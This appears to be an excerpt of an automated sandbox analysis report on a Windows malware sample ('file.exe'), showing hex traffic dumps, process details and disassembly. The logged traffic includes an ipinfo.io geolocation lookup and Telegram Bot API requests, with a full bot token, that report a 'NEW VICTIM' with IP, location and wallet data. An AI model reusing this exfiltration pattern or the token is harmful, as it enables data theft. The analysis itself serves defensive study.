                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b
                                                                                                                                                                Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
                                                                                                                                                                2024-12-12 16:01:21 UTC1390INData Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58
                                                                                                                                                                Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3X


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.54971034.117.59.814436660C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:20 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                User-Agent: IPInfoFetcher
                                                                                                                                                                Host: ipinfo.io
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:21 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                Content-Length: 321
                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                date: Thu, 12 Dec 2024 16:01:21 GMT
                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                via: 1.1 google
                                                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-12 16:01:21 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.549712149.154.167.2204436660C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:22 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                User-Agent: TelegramBot
                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:23 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:23 GMT
                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                Content-Length: 776
                                                                                                                                                                Connection: close
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                2024-12-12 16:01:23 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":3331,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.54971934.117.59.814435576C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:23 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                User-Agent: IPInfoFetcher
                                                                                                                                                                Host: ipinfo.io
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:23 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                Content-Length: 321
                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                date: Thu, 12 Dec 2024 16:01:23 GMT
                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                via: 1.1 google
                                                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-12 16:01:23 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.549720149.154.167.2204435576C:\Users\user\Desktop\file.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-12 16:01:24 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                User-Agent: TelegramBot
                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:25 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:25 GMT
                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                Content-Length: 776
                                                                                                                                                                Connection: close
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                2024-12-12 16:01:25 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":3332,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:11:01:07
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                Imagebase:0x7ff72c9b0000
                                                                                                                                                                File size:605'696 bytes
                                                                                                                                                                MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:11:01:08
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Imagebase:0x7ff72c9b0000
                                                                                                                                                                File size:605'696 bytes
                                                                                                                                                                MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:11:01:18
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff67d6f0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:11:01:21
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff67d6f0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:11:01:28
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff67d6f0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:11:01:36
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff6068e0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:12.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:49.2%
                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                  Total number of Limit Nodes:64
                                                                                                                                                                  execution_graph 41293 7ff72c9f8635 41305 7ff72c9f93f8 41293->41305 41310 7ff72ca06f84 GetLastError 41305->41310 41311 7ff72ca06fc5 FlsSetValue 41310->41311 41312 7ff72ca06fa8 FlsGetValue 41310->41312 41314 7ff72ca06fd7 41311->41314 41329 7ff72ca06fb5 41311->41329 41313 7ff72ca06fbf 41312->41313 41312->41329 41313->41311 41333 7ff72ca087c4 41314->41333 41315 7ff72ca07031 SetLastError 41317 7ff72ca07051 41315->41317 41318 7ff72c9f9401 41315->41318 41349 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41317->41349 41332 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41318->41332 41321 7ff72ca07004 FlsSetValue 41324 7ff72ca07022 41321->41324 41325 7ff72ca07010 FlsSetValue 41321->41325 41322 7ff72ca06ff4 FlsSetValue 41323 7ff72ca06ffd 41322->41323 41342 7ff72ca08340 41323->41342 41348 7ff72ca06d34 11 API calls _set_fmode 41324->41348 41325->41323 41329->41315 41330 7ff72ca0702a 41331 7ff72ca08340 __free_lconv_num 11 API calls 41330->41331 41331->41315 41334 7ff72ca087e3 _set_fmode 41333->41334 41335 7ff72ca087d5 41333->41335 41336 7ff72ca0880a HeapAlloc 41334->41336 41337 7ff72ca08826 41334->41337 41350 7ff72ca0324c 41334->41350 41335->41334 41335->41337 41336->41334 41338 7ff72ca08824 41336->41338 41353 7ff72ca01674 11 API calls _set_fmode 41337->41353 41340 7ff72ca06fe6 41338->41340 41340->41321 41340->41322 41343 7ff72ca08374 41342->41343 41344 7ff72ca08345 RtlFreeHeap 41342->41344 41343->41329 41344->41343 41345 7ff72ca08360 GetLastError 41344->41345 41346 7ff72ca0836d __free_lconv_num 41345->41346 41360 7ff72ca01674 11 API calls _set_fmode 41346->41360 41348->41330 41354 7ff72ca0328c 41350->41354 41353->41340 41359 7ff72ca01f64 EnterCriticalSection 41354->41359 41360->41343 41361 7ff72c9e8ce3 41368 7ff72c9f2a38 41361->41368 41364 7ff72c9f2a38 std::_Facet_Register 50 API calls 41365 7ff72c9e8d1b 41364->41365 41378 7ff72c9ea300 41365->41378 41370 7ff72c9f2a43 41368->41370 41371 7ff72c9e8ced 41370->41371 41372 7ff72ca0324c std::_Facet_Register 2 API calls 41370->41372 41373 7ff72c9f2a62 41370->41373 41388 7ff72c9fdc28 41370->41388 41371->41364 41372->41370 41376 7ff72c9f2a6d 41373->41376 41395 7ff72c9eeea4 RtlPcToFileHeader RaiseException _com_raise_error Concurrency::cancel_current_task 41373->41395 41396 7ff72c9b2370 50 API calls 3 library calls 41376->41396 41377 7ff72c9f2a73 41379 7ff72c9e8d41 41378->41379 41380 7ff72c9ea332 41378->41380 41381 7ff72c9f2a38 std::_Facet_Register 50 API calls 41380->41381 41382 7ff72c9ea34a 41381->41382 41398 7ff72c9e7910 41382->41398 41384 7ff72c9ea367 41407 7ff72c9e7af0 41384->41407 41387 7ff72c9ea300 50 API calls 41387->41379 41393 7ff72ca0a168 _set_fmode 41388->41393 41389 7ff72ca0a1b3 41397 7ff72ca01674 11 API calls _set_fmode 41389->41397 41391 7ff72ca0a19a HeapAlloc 41392 7ff72ca0a1b1 41391->41392 41391->41393 41392->41370 41393->41389 41393->41391 41394 7ff72ca0324c std::_Facet_Register 2 API calls 41393->41394 41394->41393 41396->41377 41397->41392 41399 7ff72c9e7937 41398->41399 41402 7ff72c9e7965 ctype 41398->41402 41400 7ff72c9fdc28 __std_exception_copy 12 API calls 41399->41400 41399->41402 41401 7ff72c9e795d 41400->41401 41401->41402 41411 7ff72c9cf4a0 41401->41411 41402->41384 41406 7ff72c9e79e7 41406->41384 41408 7ff72c9e7b12 41407->41408 41443 7ff72c9e8e50 41408->41443 41410 7ff72c9e7b1d 41410->41387 41412 7ff72c9cf4c0 41411->41412 41412->41412 41416 7ff72c9d44a0 41412->41416 41414 7ff72c9cf4ce 41415 7ff72c9e7770 50 API calls 3 library calls 41414->41415 41415->41406 41417 7ff72c9d4594 41416->41417 41420 7ff72c9d44c6 41416->41420 41436 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 41417->41436 41422 7ff72c9d44cc ctype 41420->41422 41423 7ff72c9d4555 41420->41423 41424 7ff72c9d44fc 41420->41424 41421 7ff72c9f2a38 std::_Facet_Register 50 API calls 41425 7ff72c9d4512 41421->41425 41422->41414 41427 7ff72c9f2a38 std::_Facet_Register 50 API calls 41423->41427 41424->41421 41426 7ff72c9d458e 41424->41426 41425->41422 41430 7ff72c9fcd30 41425->41430 41435 7ff72c9b2370 50 API calls 3 library calls 41426->41435 41427->41422 41437 7ff72c9fcba8 47 API calls 2 library calls 41430->41437 41432 7ff72c9fcd49 41438 7ff72c9fcd60 IsProcessorFeaturePresent 41432->41438 41435->41417 41437->41432 41439 7ff72c9fcd73 41438->41439 41442 7ff72c9fca44 14 API calls 3 library calls 41439->41442 41441 7ff72c9fcd8e GetCurrentProcess TerminateProcess 41442->41441 41446 7ff72c9e9dc0 41443->41446 41445 7ff72c9e8e73 _Receive_impl 41445->41410 41447 7ff72c9e9ded 41446->41447 41449 7ff72c9e9df7 _Receive_impl 41446->41449 41448 7ff72c9f2a38 std::_Facet_Register 50 API calls 41447->41448 41448->41449 41449->41445 41450 7ff72c9b5060 41451 7ff72c9b5094 41450->41451 41467 7ff72c9b5226 _Receive_impl 41451->41467 41473 7ff72c9cf080 41451->41473 41454 7ff72c9b50ca 41487 7ff72c9d4160 41454->41487 41457 7ff72c9b50fc 41501 7ff72c9b3d40 41457->41501 41459 7ff72c9b510a _Receive_impl 41472 7ff72c9b525d 41459->41472 41515 7ff72c9ee3cc 41459->41515 41462 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 41463 7ff72c9b5263 41462->41463 41464 7ff72c9b51a4 41468 7ff72c9b519e 41464->41468 41526 7ff72c9b55a0 41464->41526 41465 7ff72c9b516b 41465->41468 41523 7ff72c9ee38c FindNextFileW 41465->41523 41532 7ff72c9f2770 41467->41532 41468->41467 41470 7ff72c9b5258 41468->41470 41471 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 41470->41471 41471->41472 41472->41462 41477 7ff72c9cf0ae 41473->41477 41474 7ff72c9cf1a3 41542 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 41474->41542 41477->41474 41478 7ff72c9cf19d 41477->41478 41480 7ff72c9cf0ca ctype 41477->41480 41481 7ff72c9cf164 41477->41481 41482 7ff72c9cf13d 41477->41482 41541 7ff72c9b2370 50 API calls 3 library calls 41478->41541 41480->41454 41483 7ff72c9f2a38 std::_Facet_Register 50 API calls 41481->41483 41482->41478 41484 7ff72c9f2a38 std::_Facet_Register 50 API calls 41482->41484 41483->41480 41485 7ff72c9cf14e 41484->41485 41485->41480 41486 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 41485->41486 41486->41478 41491 7ff72c9d4186 41487->41491 41495 7ff72c9d4286 41487->41495 41489 7ff72c9d4191 ctype 41489->41457 41491->41489 41492 7ff72c9d423e 41491->41492 41493 7ff72c9d41ea 41491->41493 41500 7ff72c9d4280 41491->41500 41496 7ff72c9f2a38 std::_Facet_Register 50 API calls 41492->41496 41497 7ff72c9f2a38 std::_Facet_Register 50 API calls 41493->41497 41493->41500 41544 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 41495->41544 41496->41489 41498 7ff72c9d41ff 41497->41498 41498->41489 41499 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 41498->41499 41499->41500 41543 7ff72c9b2370 50 API calls 3 library calls 41500->41543 41502 7ff72c9b3d5f 41501->41502 41503 7ff72c9b3e6b 41502->41503 41513 7ff72c9b3e4a 41502->41513 41504 7ff72c9b3e97 41503->41504 41505 7ff72c9b3ec0 41503->41505 41506 7ff72c9b3f58 41504->41506 41507 7ff72c9b3ea7 41504->41507 41505->41507 41546 7ff72c9d3cb0 50 API calls 6 library calls 41505->41546 41552 7ff72c9d1520 50 API calls 41506->41552 41547 7ff72c9cefc0 41507->41547 41510 7ff72c9b3e55 41510->41459 41545 7ff72c9b44d0 50 API calls ctype 41513->41545 41516 7ff72c9ee3ea FindClose 41515->41516 41517 7ff72c9ee3f7 FindFirstFileExW 41515->41517 41516->41517 41518 7ff72c9ee438 41516->41518 41519 7ff72c9ee422 GetLastError 41517->41519 41521 7ff72c9b5165 41517->41521 41554 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41518->41554 41519->41521 41521->41464 41521->41465 41524 7ff72c9ee3a1 GetLastError 41523->41524 41525 7ff72c9ee39a 41523->41525 41525->41465 41527 7ff72c9b55d1 41526->41527 41555 7ff72c9ee440 41527->41555 41530 7ff72c9f2770 codecvt 8 API calls 41531 7ff72c9b5672 41530->41531 41531->41468 41533 7ff72c9f2779 41532->41533 41534 7ff72c9b5244 41533->41534 41535 7ff72c9f27cc IsProcessorFeaturePresent 41533->41535 41536 7ff72c9f27e4 41535->41536 41604 7ff72c9f29c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41536->41604 41538 7ff72c9f27f7 41605 7ff72c9f2798 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41538->41605 41541->41474 41543->41495 41545->41510 41546->41507 41548 7ff72c9cf023 41547->41548 41551 7ff72c9cefdf ctype 41547->41551 41553 7ff72c9d3fa0 50 API calls 6 library calls 41548->41553 41550 7ff72c9cf039 41550->41510 41551->41510 41553->41550 41556 7ff72c9ee482 41555->41556 41557 7ff72c9ee48b 41556->41557 41560 7ff72c9ee4e3 GetFileAttributesExW 41556->41560 41564 7ff72c9ee548 41556->41564 41558 7ff72c9f2770 codecvt 8 API calls 41557->41558 41561 7ff72c9b55ed 41558->41561 41563 7ff72c9ee4f7 GetLastError 41560->41563 41560->41564 41561->41530 41563->41557 41567 7ff72c9ee506 FindFirstFileW 41563->41567 41564->41557 41597 7ff72c9ee770 CreateFileW 41564->41597 41565 7ff72c9ee5e6 41569 7ff72c9ee5f5 GetFileInformationByHandleEx 41565->41569 41570 7ff72c9ee693 41565->41570 41566 7ff72c9ee5c6 41566->41557 41568 7ff72c9ee5d1 CloseHandle 